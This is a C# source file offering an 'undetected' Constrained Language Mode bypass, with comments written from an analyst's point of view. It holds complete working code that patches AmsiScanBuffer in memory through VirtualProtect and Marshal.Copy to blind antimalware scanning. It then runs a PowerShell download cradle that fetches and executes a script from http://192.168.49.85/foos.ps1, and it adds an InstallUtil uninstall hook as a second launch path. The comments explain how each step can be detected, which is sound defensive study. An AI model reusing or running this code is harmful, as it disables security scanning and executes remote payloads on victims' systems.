// Undetected CLM Bypass with obfuscated AMSI patch | |
using System; | |
using System.Management.Automation; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
using System.Management.Automation.Runspaces; | |
using System.Configuration.Install; | |
namespace Bypass { | |
class Program { | |
    // Review notes (analyst/defender stance). The code is left byte-for-byte as found; the
    // comments record what each step does and where it is observable, so the sample can be
    // understood and detected.
    //
    // Summary: resolve AmsiScanBuffer inside amsi.dll in the current process, overwrite its
    // first six bytes, then run a remote PowerShell script through an in-process runspace.
    // The header comment calls this an "obfuscated AMSI patch"; the obfuscation amounts to
    // two base64-encoded strings and a one-byte arithmetic transform of the patch bytes.

    // Native imports used for the in-memory patch. This kernel32 sequence
    // (LoadLibrary -> GetProcAddress -> VirtualProtect) issued from a managed process is a
    // classic API-sequence indicator for user-mode hook/patch activity.
    [DllImport("kernel32")] | |
    static extern IntPtr GetProcAddress( | |
        IntPtr hModule, | |
        string procName); | |
    [DllImport("kernel32")] | |
    static extern IntPtr LoadLibrary( | |
        string name); | |
    [DllImport("kernel32")] | |
    static extern bool VirtualProtect( | |
        IntPtr lpAddress, | |
        UIntPtr dwSize, | |
        uint flNewProtect, | |
        out uint lpflOldProtect); | |

    // Entry point when the assembly is executed directly; all behaviour lives in foo().
    // The Sample installer class in this file is a second entry into the same method.
    static void Main(string[] args) { | |
        foo(); | |
    } | |

    // Patches AMSI in the current process, then executes a remote script.
    // Public so that Sample.Uninstall can call it as well.
    public static void foo() { | |
        // "YW1zaS5kbGw=" is base64 for "amsi.dll". Encoding the name only defeats naive
        // static string matching; the decoded value exists in memory at runtime and is
        // trivially recovered by any base64-aware scanner.
        byte[] data = Convert.FromBase64String("YW1zaS5kbGw="); | |
        string am = Encoding.UTF8.GetString(data); | |
        // Loads amsi.dll (or returns the existing handle) so its export can be resolved.
        var lib = LoadLibrary(am); | |
        // "QW1zaVNjYW5CdWZmZXI=" is base64 for "AmsiScanBuffer".
        data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="); | |
        am = Encoding.UTF8.GetString(data); | |
        // asb = address of AmsiScanBuffer; this is the location that gets overwritten.
        var asb = GetProcAddress(lib, am); | |
        // Six patch bytes, each stored as (real byte + 1) so the literal does not match
        // signatures for the commonly seen AMSI patch stub; the loop subtracts 1 at runtime.
        // NOTE(review): the recovered bytes look like a short "return an error HRESULT" stub
        // that makes scan calls fail open — confirm by disassembling them. Defensively, the
        // direct check is to compare the first bytes of AmsiScanBuffer in process memory
        // against the on-disk image of amsi.dll.
        var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 }; | |
        for(int i = 0; i < patch.Length; i++) { | |
            patch[i] = (byte)(((uint)patch[i] - 1)); | |
        } | |
        // 0x40 = PAGE_EXECUTE_READWRITE: makes the code page writable. A protection change
        // to RWX on a page inside a loaded system DLL is a high-signal event for EDR
        // memory-protection telemetry. The bool result is discarded, so a denied change is
        // silent here (the following Marshal.Copy would then fault).
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect); | |
        // Writes the decoded bytes over the start of AmsiScanBuffer.
        Marshal.Copy(patch, 0, asb, patch.Length); | |
        // Restores the previous protection; again the return value is ignored.
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _); | |
        // Download cradle: fetches script text over plain HTTP from a hard-coded
        // private-range (RFC 1918) address and evaluates it with IEX. The URL literal on
        // this line is the sample's network indicator.
        String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')"; | |
        // Runs the command in a PowerShell runspace hosted inside this process instead of
        // powershell.exe. System.Management.Automation.dll being loaded into a
        // non-PowerShell host is itself a useful detection signal. The header labels this a
        // "CLM bypass"; presumably because a self-hosted runspace does not pick up the
        // language-mode restriction configured for the standard host — this depends on how
        // CLM is enforced in the environment, so confirm. Script block logging lives in the
        // engine, so the script text should still be logged where that policy is enabled
        // — verify.
        Runspace rs = RunspaceFactory.CreateRunspace(); | |
        rs.Open(); | |
        PowerShell ps = PowerShell.Create(); | |
        ps.Runspace = rs; | |
        ps.AddScript(cmd); | |
        ps.Invoke(); | |
        // Closes the runspace; the PowerShell instance is never disposed.
        rs.Close(); | |
    } | |
} | |
// Installer-class entry: with RunInstaller(true), the .NET installer utility
// (InstallUtil.exe) instantiates this type, and its uninstall path ends up in Program.foo().
// This gives the assembly a second launch path that never goes through Main — a known
// execution-by-proxy pattern, so installer-utility process lineage (particularly an
// uninstall of an assembly outside a normal install location) is worth monitoring.
[System.ComponentModel.RunInstaller(true)] | |
public class Sample : System.Configuration.Install.Installer { | |
    // Called by the installer framework on uninstall; the base call runs first, then the payload.
    public override void Uninstall(System.Collections.IDictionary savedState) { | |
        base.Uninstall(savedState); | |
        Program.foo(); | |
    } | |
} | |
} | |